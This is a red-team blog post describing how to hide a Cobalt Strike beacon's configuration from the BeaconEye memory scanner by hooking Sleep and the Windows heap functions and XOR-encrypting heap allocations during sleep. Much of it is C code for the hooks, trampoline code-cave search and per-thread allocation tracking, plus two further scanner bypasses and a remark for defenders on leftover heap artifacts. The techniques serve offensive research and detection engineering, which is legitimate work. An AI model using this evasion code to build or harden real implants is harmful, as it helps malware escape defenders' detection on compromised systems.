Hook Heaps and Live Free

December 8, 2021 Arash Parsa

hook heaps featured img

I wanted to write this blog post to talk a bit about Cobalt Strike, function hooking and the Windows heap.  We will be targeting BeaconEye (https://github.com/CCob/BeaconEye) as our detection tool to bypass.

Recently, I saw lots of tweets from MDSec Labs regarding NightHawk and some of its magic. I was inspired to try to re-create some of this magic within my own dropper to both understand it better and try to create a competitive dropper within my own Red Team kit.  I decided the best place to start would be with encrypting heap allocations.

Let’s talk a bit about why we want to encrypt heap allocations. Something I’m not going to go into too deeply is the difference between the stack and the heap. The stack is locally scoped and usually falls out of scope when a function completes. This means items set on the stack during the run of a function fall off the stack when the function returns and completes; this obviously isn’t great for variables you’d like to keep long term in memory. This is where the heap comes in. The heap is meant to be more of a long-term memory storage solution. Allocations on the heap stay on the heap until your code manually frees them. This can also lead to memory leaks if you continually allocate data onto the heap without ever freeing anything.

Based on this description, let’s consider some of the data the heap would contain. The heap would potentially contain long-term configuration information such as Cobalt Strike’s sacrificial process, sleep time, paths for callbacks, etc. Knowing this, it’s obvious we’d like to protect this data. So, then you say, “but wait, there’s sleep and obfuscate!” but (unless I did something wrong) it does not appear to actually encrypt heap strings. This means if your Cobalt Strike agent is running in memory, any defender could see in plain text your configuration in a processes heap space. We, as defenders, would not even need to identify your injected thread; we could easily HeapWalk() (https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapwalk) all allocations and identify something as simple as “%windir%” to try to identify your sacrificial processes (obviously, this can be changed and isn’t a great hard indicator, but you get the general idea — example code below):

static PROCESS_HEAP_ENTRY entry;
BOOL IdentifyStringInHeap() {
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(GetProcessHeap(), &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            // Find str in the allocated space by iterating over its whole size
            // lpData is the pointer and cbData is the size
            findStr("%windir%", entry.lpData, entry.cbData);
        }
    }
}

As you can see, this is quite an alarming thought. So now that we know about this problem, we must now venture to resolve it. This begs the question: how?

We have several potential resolutions and problems that occur with each one. Let’s start with the case of the standalone EXE, as this one is far simpler. This binary is your Cobalt Strike payload and nothing else. In this case, we can very easily accomplish our goal as the only thing using the heap is our evil payload. Using the previously mentioned HeapWalk() function, we can iterate over every allocation in the heap and encrypt it! To prevent errors, we can suspend all threads before encrypting the heap and then resume all threads post encryption.

  • An important note: Even if you think your program is single threaded, Windows appears to provide threads in the background that do garbage collection and other types of functions for utilities like RPC and WININET. If you don’t suspend those threads, they will crash your process as they try to reference encrypted allocations. Here is a sample crash below:

image1

Windows Background Threads

image-2

wininet.dll Thread Crash

In theory, this is an easy implementation! The last piece of the puzzle is how to invoke all of this when Cobalt Strike sleeps. The solution is simple.

Hooking

If we look at the IAT (Import Address Table) for the Cobalt Strike binary, we will see it leverages Kernel32.dll Sleep for its Sleep functionality.

image-3

Cobalt Strike Imports (Sleep is of Specific Interest)

All we need to do is hook Sleep in kernel32.dll and then alter the behavior in our hooked sleep to the following:

void WINAPI HookedSleep(DWORD dwMiliseconds) {
        DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
        HeapEncryptDecrypt();

        OldSleep(dwMiliseconds);

        HeapEncryptDecrypt();
        DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
}

Basically, we suspend all the threads and run our encryption routine which looks like the following:

static PROCESS_HEAP_ENTRY entry;
VOID HeapEncryptDecrypt() {
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(currentHeap, &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            XORFunction(key, keySize, (char*)(entry.lpData), entry.cbData);
        }
    }
}

This creates a PROCESS_HEAP_ENTRY struct, zeros it out every call, then walks the heap and puts the data in the struct. We then check the flags of the current heap entry and verify if it is allocated so that we only encrypt the allocations.

Then we run the original/old sleep function which will be created as part of our hooking functionality and then decrypt before resuming threads. That way we can prevent crashes when the allocations are once again referenced. In all, it’s a fairly simple process. What we haven’t touched on is the hooking capability.

First off, what is function hooking? Function hooking means we are rerouting calls to a function such as Sleep() within a process space to run our arbitrary function in memory instead. By doing this, we can change the function’s behavior, observe the arguments being called (since our arbitrary function is now called, we can print the arguments passed to it, for example) and even prevent the function from working at all. In many cases, this is how EDRs work to monitor and alert on suspicious behavior. They hook what they consider interesting functions, such as CreateRemoteThread, and log all the arguments to alert on suspicious calls later.

Let’s talk about how to hook a function. To me, this was the most fun and interesting part of the whole experience. There are many ways to accomplish this, but I’m only going to mention two and go in depth on one. The two techniques I will mention are IAT hooking and Trampoline Patching (it’s probably not the right term, but I’m not quite sure what is).

IAT Hooking

The idea behind IAT hooking is simple. Every process space has what’s called an Import Address Table. This table contains a list of DLLs and the relevant function pointers that have been imported by the binary for usage. The recommended and most stable way of hooking is to walk the Import Address Table, identify the DLL you are trying to hook, identify the function you would like to hook and overwrite its function pointer to your arbitrary hooked function instead. Whenever the process calls the function, it will locate the pointer and call your function instead. If you would like to call the old function as part of your hooked function, you can store the old pointer. An example already exists at ired.team, I will link it here: https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking.

Now there are advantages and disadvantages to this method. The two major obvious advantages are that it is very simple to implement and it’s very stable. You are changing what function is called and that’s it, you aren’t altering anything with a big risk of crashing.  Now let’s talk about the disadvantages.

If anything uses GetProcAddress() to resolve the function, it won’t be in the IAT (though I believe you can perform EAT hooking to resolve that but that’s for another time). It’s a very targeted hooking method that can be a benefit, but it is a double-edged sword if you want to monitor a wider range of calls (such as being able to hook NtCreateThreadEx vs just CreateRemoteThread where you may miss lots of calls if they go lower level).  It’s also much easier to detect in theory.

This is simple enough; I won’t go into it too much. Here’s another post on the matter as well: https://guidedhacking.com/threads/how-to-hook-import-address-table-iat-hooking.13555/

Trampoline Patching

Let’s now talk about Trampoline Patching. Trampoline Patching is much more difficult to pull off, much more difficult to get stable, and can take a very long time to do universally for x64 due to a lot of relative addressing that must be resolved. Thankfully, someone already took the time to make an open-source library that performs what’s required to accomplish all this in a very stable manner: https://github.com/TsudaKageyu/minhook.

But for the sake of learning, let’s go ahead and look at how this kind of hooker works, so we could re-implement our own if we wanted. At first, I had considered sharing my own implementation, but I decided it’d be an exercise best left to the reader (especially as other implementations for study already exist). Instead, we will debug my implementation to better understand how this patching mechanism works.

The idea overall works like this: wall of text incoming! We will resolve the base of the function using GetProcAddress and LoadLibrary. We will then resolve the first X number of instructions that are valid assembly and add up to a minimum of five bytes. To be more specific, we will be using a very common technique that uses the five-byte relative jump opcode (E9) to jump to a location +- 2GB from the function base that will then jump to our arbitrary function. Obviously, for this to work we need to overwrite the first five bytes of the function. If we do that, we break the original function if we ever need to call it again. To ensure we can resolve the old functionality if needed, we must save the first instruction that we will later write into a code cave as part of a trampoline that will run it for us and then jump back to the functions next instruction. But if the first instruction is only four bytes, we break the first opcode of the second instruction if we write five bytes. We will then need to store the first two instructions in our trampoline, and now the trampoline will run the first two instructions and jump back to the third instruction to continue execution. Wherever this trampoline lives will be the new pointer for the original function that is being hooked. So, the original function pointer now runs like this ->

OldFunction = Trampoline -> JMP to original location of function + size of trampoline

This code cave will also have a jump to the location of our arbitrary function somewhere; the relative five-byte jump written at the base of the original function jumps to this location which then jumps to the arbitrary function like this ->

Base of old function jmps -> cave that contains the following assembly 
FF 25 00 00 00 00 [PUSH QWORD PTR]

00 00 00 00 00 00 00 00 [This is an arbitrary pointer to your function, in your C it would be &ArbitraryFunction]

With this, we now have a way to run our arbitrary function when the old function is called and call the old/original function as we need.

Let’s now take a look at this while debugging. We will hook MessageBoxA.  First, let’s see what MessageBoxA looks like clean vs. hooked.

First, we hook MessageBoxA. The code looks something like:

Hook("user32.dll", "MessageBoxA", (LPVOID)NewMessageBoxA, (FARPROC*)&OldMessageBoxA);

MessageBoxA lives in user32.dll, so if we want to get its base address, that’s where we must find it. With this, we find the base address, patch everything, add some code to a cave, resolve the relative jump and store the trampoline in OldMessageBoxA().

Our arbitrary/hooked MessageBoxA function will look like this:

int WINAPI HookedMB(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {
    return OldMB(hWnd, "HOOKED", lpCaption, uType);
}

We need to match the return type and arguments, and here we will run the original MessageBoxA but we will alter the text to always say “HOOKED” no matter what.

Now let’s see what it looks like before and after.

BEFORE

image-4

image-5

 

Before Patching Unhooked message Box

 

AFTER

image-6

image-7

After Patching Hooked Message Box

So Message Box A is a somewhat perfect example of the issue previously mentioned. As you can see, in the BEFORE screenshot the first instruction is only four bytes. This means we’ll need to store the first two instructions; then our relative jump continues to overwrite the first five. We do not need to alter the remaining bytes because we will have our trampoline execute the first two we stored and then jump back to location 0x00007FF8EF70AC27. Let’s continue in the debugger to see what the new hooked functionality looks like. We will start right after running the JMP:

image-8

Jump to Hooked Function

Here we see two 00s first. I do this to make sure if we are writing multiple trampolines to the cave that we don’t overwrite the end of a 00 00 in a function pointer. Next, we see FF 25 00 00 00 00, which is the JMP QWORD PTR instruction. Right after, you will see the eight bytes that are the pointer to our hooked function! If we execute this instruction, we will see:

image-9

First Instruction in Hooked Function

 

And finally:

image-10

Inside Hooked Function

Here we can see we are in our hooked function. The hooked function only runs and returns the old function, so let’s continue execution into the old function:

image-11

Call the Old Function

Let’s see where that leads:

image-12

Trampoline

If you look at this image, you can see we are executing the first two instructions we overwrote! Right after the copied bytes, we do a second JMP QWORD PTR to the location of the OriginalFunction+7 (since the size of the trampoline is seven bytes in this instance). This will put us right at the start of the third instruction. Let’s see:

image-13

Continued Execution

Here you can see we are now at the CMP instruction, continuing execution right from where we left off.

Through this process, you can see how utilities like minhook work. Now, you can either implement it yourself like I did or just use something stable like minhook. In case you are feeling adventurous, I’ll give you a freebie of some non-optimized cave-finding code that identifies any cave-forward two gigs (you’ll need to figure some parts out, nothing in life is completely free):

for (i = 0; i < 2147483652; i ++) { currentByte = (LPBYTE)funcAddress + i; if (memcmp(currentByte, "\x00", 1) == 0) { caveLength += 1; LPBYTE newByteForward = currentByte + 1; if (memcmp(newByteForward, "\x00", 1) == 0) { while (memcmp(newByteForward, "\x00", 1) == 0) { caveLength++; newByteForward++; } } if (caveLength >= totalSize) {
			while (memcmp(currentByte - 1, "\x00", 1) != 0 || memcmp(currentByte - 2, "\x00", 1) != 0) {
				currentByte++;
			}
			// Make sure the section is executable or try again
			MEMORY_BASIC_INFORMATION info;
			VirtualQuery(currentByte, &info, totalSize);
			if (info.AllocationProtect == 0x80 || info.AllocationProtect == 0x20 || info.AllocationProtect == 0x40) {
				break;
			}
			else {
				i += caveLength;
				caveLength = 0;
				continue;
			}
		}
		else {
			i += caveLength;
			caveLength = 0;
			continue;
		}
	}
}

Putting the EXE Together

Time to put everything together and see what it looks like. Let’s go over the steps:

  1. Hook Sleep()
  2. In your hooked function, suspend all threads
  3. Encrypt all allocations using HeapWalk()
  4. Run the original Sleep() through the trampoline function
  5. Decrypt all allocations using HeapWalk()
  6. Resume all threads

I’m going to assume you have your own encryption, hooking and full thread suspension functionalities. Code should look something like this:

static PROCESS_HEAP_ENTRY entry;
VOID HeapEncryptDecrypt() {
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(currentHeap, &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            XORFunction(key, keySize, (char*)(entry.lpData), entry.cbData);
        }
    }
}

static void(WINAPI* OrigianlSleepFunction)(DWORD dwMiliseconds);
void WINAPI HookedSleepFunction(DWORD dwMiliseconds) {
    DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
    HeapEncryptDecrypt();

    OriginalSleepFunction(dwMiliseconds);

    HeapEncryptDecrypt();
    DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
}
    
void main()
{
    DoSuspendThreads(GetCurrentProcessId(), GetCurrentThreadId());
    Hook("kernel32.dll", "Sleep", (LPVOID)HookedSleepFunction, (FARPROC*)&OriginalSleepFunction, true);
    if (!OldAlloc) {
        MessageBoxA(NULL, "Hooking RtlAllocateHeap failed.", "Status", NULL);
    }
    DoResumeThreads(GetCurrentProcessId(), GetCurrentThreadId());
    // Sleep is now hooked
}

Very straightforward, this code obviously doesn’t include your implant. You can either run the implant in the same process space by executing shell code somehow, or you can turn this into a DLL and inject it into the beacon post execution. Since it uses HeapWalk(), it can encrypt past, present and future allocations all with no issues — only needing to hook Sleep() to begin the call.

Demo time! For this demo, we do no encryption for anything with a sleep of one or less.

image-14

EXE HeapWalk() Encryptor Demo

As you can see, first we do a sleep of 1, and BeaconEye catches our configuration.  We change the sleep to 5, and encrypting begins, successfully shutting down BeaconEye.

Remember, since this encrypts ALL heap allocations, this will NOT work as an injected thread, as the process it’s injected in will not function while Cobalt Strike is sleeping. Imagine injecting into explorer.exe, and every time beacon sleeps, all of Explorer just freezes. This solution obviously isn’t optimal when it comes time to inject as a thread. If we want something that will work as a thread, we will need to do way more work.

A demo can be found here: https://github.com/waldo-irc/LockdExeDemo.

Thread Targeted Heap Encryption: Considerations

Our new design will have to work with a separate thread. We will not be able to suspend additional threads; we can’t lock the heap, and the main process will need to continue functioning. This means when we inject a beacon thread, we will have to ensure that ALL encrypted allocations are from that thread only. If we properly target the thread, we can successfully avoid issues. So, how can we do this?

We now have hooking capabilities in our dropper. To manipulate the heap, there is a subset of functions called within Windows:

  1. HeapCreate()
  2. HeapAllocate()
  3. HeapReAllocate()
  4. HeapFree()
  5. HeapDestroy()

Malloc and free within Windows, located in msvcrt.dll, are actually high-level wrappers for HeapAllocate() and HeapFree(), which are high-level wrappers for RtlAllocateHeap() and RtlFreeHeap() which are the functions within Windows on the lowest level that end up managing the heap directly.

image-15

Picture for Proof from Ghidra

This means if we hook RtlAllocateHeap(), RtlReAllocateHeap() and RtlFreeHeap(), we can keep track of everything being allocated and freed within heap space in Cobalt Strike. This is nice because by hooking these three functions, we can insert allocations and re-allocations in a map and remove them from a map when free is called. This still doesn’t solve our thread target problem, though, does it?

An easy fix! It turns out that if you call GetCurrentThreadId() from a hooked function, you are actually able to get the thread id of the calling thread, Using this, you can inject your beacon, get its thread id and do something similar to below:

GlobalThreadId = GetCurrentThreadId(); We get the thread Id of our dropper!
HookedHeapAlloc () {
    if (GlobalThreadId == GetCurrentThreadId()) { // If the calling ThreadId matches our initial thread id then continue
        // Insert allocation into a list
    }
}

Do this for the re-allocation and do removes for the free as well, and now you are targeting a thread! Easy so far. But remember that issue from before, the reason why we had to suspend other threads? WININET and RPC calls will still try to access encrypted memory before we decrypt it in time. There are a few options here, but I used what I think is an interesting one. Since the loaded shell code was neither a valid EXE nor DLL, I was able to target allocations from anything that made a call that originated from a module with no name.

For this mechanism to work, we need to resolve the module that made the function call. This can be done with the following code:

#include 
#pragma intrinsic(_ReturnAddress)

GlobalThreadId = GetCurrentThreadId(); We get the thread Id of our dropper!

HookedHeapAlloc (Arg1, Arg2, Arg3) {
    LPVOID pointerToEncrypt = OldHeapAlloc(Arg1, Arg2, Arg3);
    if (GlobalThreadId == GetCurrentThreadId()) { // If the calling ThreadId matches our initial thread id then continue
    
    	HMODULE hModule;
    	char lpBaseName[256];

		if (::GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCSTR)_ReturnAddress(), &hModule) == 1) {
         	::GetModuleBaseNameA(GetCurrentProcess(), hModule, lpBaseName, sizeof(lpBaseName));
         }

        std::string modName = lpBaseName;
        std::transform(modName.begin(), modName.end(), modName.begin(),
                [](unsigned char c) { return std::tolower(c); });
        if (modName.find("dll") == std::string::npos && modName.find("exe") == std::string::npos) {
                     // Insert pointerToEncrypt variable into a list
        }
    }
}

This will get the _ReturnAddress intrinsic and leverage it with GetModuleHandleEx and the flag GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS to identify what module is making this call. We can then convert it to a lower-case string, and if the string does not contain DLL or EXE, we go ahead and insert it. With this, you have a stable list of allocations to encrypt on sleep. You will need to repeat this process for your hooked re- allocation.

For the encryption to run, you need to iterate the list and encrypt those allocations instead of doing HeapWalk(). This will depend on whether you decide to use a map, vector, linked list or something else. You want to store the pointer returned by the real HeapAlloc or ReAlloc into your array, iterate the array and encrypt the data there by size. Arg3 in the example above is size (https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc).

So now we hook four different functions, insert allocations based on thread id into a vector, iterate the vector and encrypt each address on sleep. If successful, we should once again bypass BeaconEye.

It’s demo time! Again, for the purposes of this demo, we do no encryption for anything with a sleep of 1 or less.

image-16

Injecting into cmd.exe and Bypassing BeaconEye

image-17

Injecting into explorer.exe and it is Stable

Success! We can inject into any process and encrypt only our own thread’s heap; the process won’t crash just because we’re sleeping.

Additional Observations During the Journey

Along this journey of stable heap encryption, there were three additional interesting discoveries I made along the way. Let’s go over each one.

The first two are additional BeaconEye bypasses. As with any tool, BeaconEye has its flaws. Completely by accident, I discovered two mechanisms that bypass BeaconEye’s capabilities completely.

The first is injecting into explorer.exe with beacon appears to bypass BeaconEye completely. Here’s the demo:

image-18

Explorer.exe BeaconEye Bypass

As you can see, injecting into cmd.exe is caught, but explorer.exe seems like it must be getting scanned ineffectively.

Additionally, initializing symbols in the binary also breaks BeaconEye completely with the following lines of code:

#include 
#pragma comment(lib, "dbghelp.lib")

SymInitialize(GetCurrentProcess(), NULL, TRUE);

The demo:

image-19

Bypass BeaconEye with Symbols

Lastly, I noticed something a bit interesting … I’m not sure people are aware, but Cobalt Strike does absolutely no cleanup on heap allocations on exit. This means if you exit an injected Cobalt Strike thread and the process doesn’t restart, your configuration now stays in memory as an extract-able artifact.

Final Demo:

image-20

Heap Artifacts

Maybe with everything you’ve been taught in the blog post you could put something together to resolve this.

image-21

Cleaning up the Heap

As for blue teams, now you know exiting isn’t the end! I may have made some mistakes during this post. Feel free to let me know, and I’ll gladly make corrections. Education is the main goal after all. You can find me on Discord.

Thanks to

  • SecIdiot for helping me think through and troubleshoot a lot in general and teaching me about HeapWalk()
  • Mr.Un1k0d3r for teaching us about how to make malware in C and inspiring this with his hooking lesson
  • ForrestOrr for helping me learn about hooking and trampolines and walking me through the logic of heap encryption

Decided to add a small demo of at least the EXE after all.  Here it is: https://github.com/waldo-irc/LockdExeDemo

In my next post, I would like to look into other hooking capabilities/ideas that could help us do a few more fun things.

Previous Article
Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters
Don’t Trust This Title: Abusing Terminal Emulators with ANSI Escape Characters

One day, while I was working on OpenShift, a Kubernetes distribution by RedHat focused on developer experie...

Next Article
Cloud Shadow Admins Revisited in Light of Nobelium
Cloud Shadow Admins Revisited in Light of Nobelium

A recently detected attack campaign involving threat actor Nobelium has caught our attention due to an atta...